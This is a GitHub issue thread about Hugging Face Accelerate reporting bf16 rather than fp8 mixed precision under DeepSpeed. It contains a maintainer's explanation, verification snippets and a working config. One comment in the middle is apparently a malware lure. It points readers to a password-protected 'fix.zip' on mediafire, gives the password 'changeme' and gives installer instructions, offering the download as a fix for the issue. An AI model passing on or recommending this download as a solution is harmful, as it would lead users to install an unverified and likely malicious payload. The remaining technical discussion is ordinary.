### ISSUE TITLE
use FP training config but the accelerator.mixed_precision shown as bfloat16

### ISSUE THREAD

**Issue by George0726** [huggingface/accelerate#3054]
### System Info

```Shell
- `Accelerate` version: 0.34.0.dev0
- Platform: Linux-5.15.0-118-generic-x86_64-with-glibc2.35
- `accelerate` bash location: /usr/local/bin/accelerate
- Python version: 3.10.12
- Numpy version: 1.24.4
- PyTorch version (GPU?): 2.4.0a0+3bcc3cddb5.nv24.07 (True)
- PyTorch XPU available: False
- PyTorch NPU available: False
- PyTorch MLU available: False
- PyTorch MUSA available: False
- System RAM: 503.36 GB
- GPU type: NVIDIA GeForce RTX 4090
- `Accelerate` default config:
        - compute_environment: LOCAL_MACHINE
        - distributed_type: DEEPSPEED
        - mixed_precision: fp8
        - use_cpu: False
        - debug: False
        - num_processes: 2
        - machine_rank: 0
        - num_machines: 0
        - rdzv_backend: static
        - same_network: True
        - main_training_function: main
        - enable_cpu_affinity: False
        - fp8_config: {'amax_compute_algorithm': 'max', 'amax_history_length': 1024, 'backend': 'TE', 'fp8_format': 'E4M3', 'interval': 1, 'margin': 0, 'override_linear_precision': False, 'use_autocast_during_eval': True}
        - deepspeed_config: {'gradient_accumulation_steps': 4, 'gradient_clipping': 5.0, 'offload_optimizer_device': 'none', 'offload_param_device': 'none', 'zero3_init_flag': False, 'zero_stage': 2}
        - downcast_bf16: no
        - tpu_use_cluster: False
        - tpu_use_sudo: False
        - tpu_env: []
```

### Information

- [ ] The official example scripts
- [X] My own modified scripts

### Tasks

- [X] One of the scripts in the examples/ folder of Accelerate or an officially supported `no_trainer` script in the `examples` folder of the `transformers` repo (such as `run_no_trainer_glue.py`)
- [X] My own task or dataset (give details below)

### Reproduction

hi author, I am trying to train the diffusion model with fp8 mix-precision. however, it seems that the accelerator.mixed_precision shows as bfloat16. I don't know if it is right. Could you give me some hint what is going on?

Thanks!
```
compute_environment: LOCAL_MACHINE
debug: false
deepspeed_config:
  gradient_accumulation_steps: 4
  gradient_clipping: 5.0
  offload_optimizer_device: none
  offload_param_device: none
  zero3_init_flag: false
  zero_stage: 2
distributed_type: DEEPSPEED
downcast_bf16: 'no'
enable_cpu_affinity: false
fp8_config:
  amax_compute_algorithm: max
  amax_history_length: 1024
  backend: TE
  fp8_format: E4M3
  interval: 1
  margin: 0
  override_linear_precision: false
  use_autocast_during_eval: true
machine_rank: 0
main_training_function: main
mixed_precision: fp8
num_machines: 0
num_processes: 2
rdzv_backend: static
same_network: true
tpu_env: []
tpu_use_cluster: false
tpu_use_sudo: false
use_cpu: false
```
`CUDA_VISIBLE_DEVICES=6,7 OMP_NUM_THREADS=6  accelerate launch --config_file=config.yaml  --main_process_port=1532 test.py`

```
    accelerator_project_config = ProjectConfiguration(project_dir=args.output_dir, logging_dir=logging_dir)
    print(accelerator_project_config)

    accelerator = Accelerator(
        gradient_accumulation_steps=args.gradient_accumulation_steps,
        mixed_precision="fp8",
        log_with=args.report_to,
        project_config=accelerator_project_config,
    )
    print(accelerator.mixed_precision)
    exit()
```

output log:

```
[2024-08-27 15:15:11,337] [INFO] [real_accelerator.py:203:get_accelerator] Setting ds_accelerator to cuda (auto detect)
ProjectConfiguration(project_dir='test', logging_dir=PosixPath('test/test'), automatic_checkpoint_naming=False, total_limit=None, iteration=0, save_on_each_node=False)
[2024-08-27 15:15:18,627] [INFO] [real_accelerator.py:203:get_accelerator] Setting ds_accelerator to cuda (auto detect)
ProjectConfiguration(project_dir='test', logging_dir=PosixPath('test/test'), automatic_checkpoint_naming=False, total_limit=None, iteration=0, save_on_each_node=False)
[2024-08-27 15:15:18,671] [INFO] [real_accelerator.py:203:get_accelerator] Setting ds_accelerator to cuda (auto detect)
[2024-08-27 15:15:20,522] [INFO] [comm.py:652:init_distributed] cdb=None
[2024-08-27 15:15:20,526] [INFO] [comm.py:652:init_distributed] cdb=None
[2024-08-27 15:15:20,526] [INFO] [comm.py:683:init_distributed] Initializing TorchBackend in DeepSpeed with backend nccl
**bf16**
**bf16**
[rank0]:[W827 15:15:21.685362691 ProcessGroupNCCL.cpp:1187] Warning: WARNING: process group has NOT been destroyed before we destruct ProcessGroupNCCL. On normal program exit, the application should call destroy_process_group to ensure that any pending NCCL operations have finished in this process. In rare cases this process can exit before this point and block the progress of another member of the process group. This constraint has always been present,  but this warning has only been added since PyTorch 2.4 (function operator())
```

### Expected behavior

I think it should show like "fp8"?

**Comment by muellerzr** [comment]
If you’re using DeepSpeed iirc it won’t show as FP8, but an easy way to check if so is by looking at accelerator.fp8_plugin. (As it’s not a DeepSpeed fp8 configuration, we just wrap the FP8 and do bf16 MP as one does with FP8)

**Comment by yiweifengyan** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by George0726** [comment]
Thanks! I cannot find any items like "fp8_plugin" in the accelerator or accelerator.state.

I used the docker image for my experiments, huggingface/accelerate:gpu-fp8-transformerengine-nightly-2024-08-26

besides, I have compared the status w/o the Deepspeed config for your reference.
Without DeepSpeed config:
![image](https://github.com/user-attachments/assets/523c3472-b929-4b68-a44d-54f763cbfad3)

With DEEPSPEED config:
![image](https://github.com/user-attachments/assets/64bf409f-8bdc-4b05-897b-acc5b79dea59)
![image](https://github.com/user-attachments/assets/6a616ecd-c663-4d14-99ff-ca9af0ca5365)

**Comment by muellerzr** [comment]
Thanks, I’ll take a look here shortly.

**Comment by muellerzr** [comment]
Another way to verify is by looking at a prepared model’s .module (for DeepSpeed) and use this util:

```python
from accelerate import Accelerator
from accelerate.utils import has_transformer_engine_layers

model = …
accelerator = Accelerator(…)
model = accelerator.prepare(model)
print(has_transformer_engine_layers(model.module)
```

**Comment by George0726** [comment]
Gocha Thanks!
I found that only by disabling DEEPSPEED that I could use fp8. I would dig into it to find the reason.

**Comment by muellerzr** [comment]
@George0726 might need a reproducer. The following works for me: (note that the state still shows bf16, that's a deepspeed requirement):

Accelerate yaml:
```yaml
distributed_type: DEEPSPEED
deepspeed_config
  deepspeed_config_file: "benchmarks/fp8/config.json"
  zero3_init_flag: true
num_processes: 2
```
Config.json:
```json
{
    "train_batch_size": 32,
    "train_micro_batch_size_per_gpu": 16,
    "gradient_accumulation_steps": 1,
    "zero_optimization": {
        "stage": 3,
        "stage3_gather_16bit_weights_on_model_save": false
    },
    "gradient_clipping": 1.0,
    "bf16": {"enabled": true},
    "fp16": {"enabled": false},
    "zero_allow_untested_optimizer": true
}
```
Code:
```python
from accelerate import Accelerator
from accelerate.utils import has_transformer_engine_layers, FP8RecipeKwargs
FP8_RECIPE_KWARGS = {"fp8_format": "HYBRID", "amax_history_len": 32, "amax_compute_algo": "max"}
kwargs_handlers = [FP8RecipeKwargs(backend="TE", **FP8_RECIPE_KWARGS)]
accelerator = Accelerator(
    mixed_precision="fp8", kwargs_handlers=kwargs_handlers
)

model, optimizer, train_dataloader, eval_dataloader, lr_scheduler = get_training_utilities(
    MODEL_NAME, accelerator=accelerator
)

model, optimizer, lr_scheduler = accelerator.prepare(model, optimizer, lr_scheduler)
assert has_transformer_engine_layers(model))
```

**Comment by George0726** [comment]
Sure, this code snippet works for me now. It is probably my wrong config format.

**Comment by muellerzr** [comment]
Great, glad to hear it. Feel free to re-ping if you face more issues!
